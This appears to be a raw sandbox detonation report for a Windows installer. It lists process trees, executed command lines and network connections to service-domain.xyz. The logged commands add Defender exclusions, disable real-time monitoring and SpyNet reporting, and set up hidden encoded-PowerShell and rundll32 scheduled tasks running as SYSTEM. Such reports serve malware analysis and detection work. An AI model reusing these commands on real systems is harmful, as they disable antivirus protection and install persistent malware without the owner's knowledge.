PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2644 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2652 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEDlVAekT" /SC once /ST 02:34:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEDlVAekT"

C:\Windows\system32\taskeng.exe

taskeng.exe {27060871-541F-48DA-9983-D97FD8321013} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEDlVAekT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe\" sw /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {E7D37AEC-52BB-4548-8C6F-972E6D0BCF3B} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUABfsEIY" /SC once /ST 06:48:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUABfsEIY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gUABfsEIY"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFVZKFScg" /SC once /ST 01:16:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gFVZKFScg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gFVZKFScg"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gepROiyfk" /SC once /ST 02:12:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gepROiyfk"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gepROiyfk"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 06:20:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\WHOECs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\aiLEFzd.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 01:29:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.129.91:80 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:80 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
